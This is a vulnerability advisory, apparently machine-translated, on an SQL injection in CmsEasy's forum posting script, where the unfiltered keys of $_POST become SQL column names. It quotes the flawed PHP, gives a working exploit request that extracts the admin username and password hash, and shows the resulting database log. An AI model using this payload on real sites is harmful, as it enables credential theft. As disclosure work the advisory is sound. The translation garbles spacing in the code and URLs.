Cmseasy SQL injection vulnerability 3 and repair

Cmseasy SQL injection vulnerability 3 and repair

Injection ..

When posting an article in bbs, the $ _ POST data is directly brought into the concatenated SQL function, resulting in injection.

/Bbs/add-archive.php 30 rows


 

if($id = $archive->inserData($_POST)){

Directly bring the entire $ _ POST



/Bbs/model/db/base. php 38 rows


 

Public function inserData ($ data) {$ r = $ this-> odb-> insert ($ this-> tblName, $ data); // if ($ r) return $ this-> odb-> getInsertId (); else return false ;}

/Bbs/commonlib/db. php


 

Public function insert ($ table, $ data) {$ SQL = $ this-> getInsertString ($ table, $ data); // concatenate SQL statements to continue reading .. Return $ this-> execSql ($ SQL );}

 

Public function getInsertString ($ table, $ data) {$ n_str = ''; $ v_str =''; $ table = $ this-> filterString ($ table ); foreach ($ data as $ k => $ v) // traverse data because the entire $ _ POST is passed through, so we can arbitrarily control the list and value {$ n_str. = $ this-> filterString ($ k ). ','; $ v_str. = "'". $ this-> filterString ($ v ). "'," ;}$ n_str = preg_replace ("/, $/", "", $ n_str); $ v_str = preg_replace ("/, $ /","", $ v_str); $ str = 'insert '. $ table. '('. $ n_str. ') VALUES ('. $ v_str. ')'; return $ str ;}

 

public function filterString($str){if ($this->magic_quotes){$str = stripslashes($str);}if ( is_numeric($str) ) {return $str;} else {$ret = @mysqli_real_escape_string($this->con, $str);if ( strlen($str) && !isset($ret) ) {$r = $this->checkConnection();if ($r !== true) {$this->closeDB();$ret = $str;}}return $ret;}}

Filtering is useless because it does not filter key statements.



There is also a 360safe. php script in it, but this does not filter key names and only filters key values.

Another point and space in the variable name are converted into underscores. However, you can use it without spaces ..



Exp:

Http: // FIG/PHP/CmsEasy/bbs/add-archive.php? Cid = 1

(POST)

Title = a & content) values (1, (SELECT (CONCAT (USERNAME, 0x7c, PASSWORD) FROM (cmseasy_user) WHERE (USERID % 3D1 ))) # = c & submit = a & verify = HKCX

Mysql Log:

2070 QueryINSERT INTO cmseasy_bbs_archive (title, content) values (1, (SELECT (CONCAT (USERNAME, 0x7c, PASSWORD) FROM (cmseasy_user) WHERE (USERID = 1 )))#, username, userid, ip, addtime) VALUES ('A', 'C', '123', '4', '123. 0.0.1 ', '123 ')






 

 

 

Solution:

Do not submit $ _ POST ..